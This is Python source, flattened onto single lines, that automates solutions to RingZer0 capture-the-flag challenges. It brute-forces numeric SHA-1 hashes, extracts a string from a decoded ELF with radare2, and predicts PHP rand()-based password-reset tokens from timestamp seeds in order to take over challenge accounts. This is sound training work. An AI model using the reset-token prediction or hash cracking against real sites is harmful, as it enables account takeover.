def ch56(): ch, s = 56, ringzer0.login() sections = ringzer0.read_challenge(s, ch) title, xhash = sections['title'], sections['hash'] ringzer0.output('solving') charset = '0123456789' result = search_hash(charset, 4, 4, hashlib.sha1, xhash) if result is None: ringzer0.error('could not lookup hash ' + xhash) ringzer0.output('solved', result) response = ringzer0.submit_challenge(s, ch, result) ringzer0.output('response', response)
def ch57(): ch, s = 57, ringzer0.login() sections = ringzer0.read_challenge(s, ch) title, xhash, xsalt = sections['title'], sections['hash'], sections['salt'] ringzer0.output('solving') charset = '0123456789' transformation = lambda x: x + xsalt result = search_hash(charset, 4, 4, hashlib.sha1, xhash, transformation) if result is None: ringzer0.error('could not lookup hash ' + xhash) result = result[:result.rindex(xsalt)] ringzer0.output('solved', result) response = ringzer0.submit_challenge(s, ch, result) ringzer0.output('response', response)
def ch15(): ch, s = 15, ringzer0.login() sections = ringzer0.read_challenge(s, ch) title, msg, chksum = sections['title'], sections['elf message'], sections['checksum'] ringzer0.output('solving') elf = msg while re.match(r'^[a-zA-Z0-9+/]*={0,3}$', elf): elf = base64.b64decode(elf) elf = elf[::-1] elf_md5 = hashlib.md5(elf).hexdigest() if chksum != elf_md5: ringzer0.error('checksum mismatch ({0} vs {1})'.format(chksum, elf_md5)) result = '' with ringzer0.tmpfile() as (fd, fn): ringzer0.write_bin_file(fd, elf) r2 = r2pipe.open(fn) asm_lines = r2.cmd('aa; s sym.main; pif~&mov,rbp').splitlines() asm_rg = re.compile(r'^mov [^,]*\[rbp\s?-\s?([0-9a-fx]+)\],\s?([^\s]+)$') asm_vals, top = {}, 0 for asm_line in asm_lines: rx = re.match(asm_rg, asm_line) if not rx: continue pos, val = rx.group(1), rx.group(2) if val.startswith('r'): continue if val.startswith('0x'): val = val[2:] if len(val) % 2 == 1: val = '0' + val pos, val = int(pos, 16), val.decode('hex') asm_vals[pos] = val top = max(top, pos) stack = bytearray('\0' * top) for k in sorted(asm_vals, reverse=True): v = asm_vals[k] stack[top - k:len(v)] = v[::-1] result = stack[:stack.index('\00')] ringzer0.output('solved', result) response = ringzer0.submit_challenge(s, ch, result) ringzer0.output('response', response)
def ch120(): ringzer0.output('creating token') token = '' for i in range(0, 16): output = check_output(['./php-xrandom', '0', str(i), '0', '0']).strip() for line in output.split('\n'): rtype, rvalue = line.split(':') rtype, rvalue = rtype.strip(), rvalue.strip() if rtype != 'linux.rand.64': continue d = int(rvalue) % 10 token += str(d) break ringzer0.output('token', token) ch, s = 120, ringzer0.login() ch_url = ringzer0.get_url('/challenges/{0}'.format(int(ch))) password = None for i in xrange(0, 50): ringzer0.output('resetting password') r = s.post(ch_url, data={'reset_username':''}) response = ringzer0.get_response(r.text) ringzer0.output('reset #{0} => {1}'.format(i, response)) r = s.get('{0}/?k={1}'.format(ch_url, token)) response = ringzer0.get_response(r.text) if response.find('password') != -1: password = response break ringzer0.output('try #{0} => {1}'.format(i, response)) time.sleep(1.75) if password is None: ringzer0.error('could not solve.') sys.exit(1) password = password.split(' ')[-1:][0] ringzer0.output('solved', password) r = s.post(ch_url, data={'username':'******', 'password':password}) response = ringzer0.get_response(r.text) ringzer0.output('response', response)
def ch113(): ch, s = 113, ringzer0.login() ch_url = ringzer0.get_url('/challenges/{0}'.format(int(ch))) ringzer0.output('solving') ringzer0.output('resetting password') r = s.post(ch_url, data={'reset_username':''}) lines = ringzer0.get_lines(r.text) r2822 = lines[0] ts = mktime_tz(parsedate_tz(r2822)) rmin, rmax = 1000000000000000, 9999999999999999 ringzer0.output('seeding random values') password, sec_diff = None, 1 for sec in range(0, sec_diff + 1): if password: break diff = sec_diff - sec seed = ts - diff output = check_output(['./php-xrandom', str(seed), '0', str(rmin), str(rmax)]).strip() for line in output.split('\n'): rtype, rvalue = line.split(':') rtype, rvalue = rtype.strip(), rvalue.strip() if rtype != 'linux.rand.64': continue r = s.get('{0}/?k={1}'.format(ch_url, rvalue)) response = ringzer0.get_response(r.text) ringzer0.output('try: {0}s => {1} ({2}) => {3}'.format(-diff, rvalue, rtype, response)) if response.find('password') != -1: password = response break if password is None: ringzer0.error('could not solve.') sys.exit(1) password = password.split(' ')[-1:][0] ringzer0.output('solved', password) r = s.post(ch_url, data={'username':'******', 'password':password}) response = ringzer0.get_response(r.text) ringzer0.output('response', response)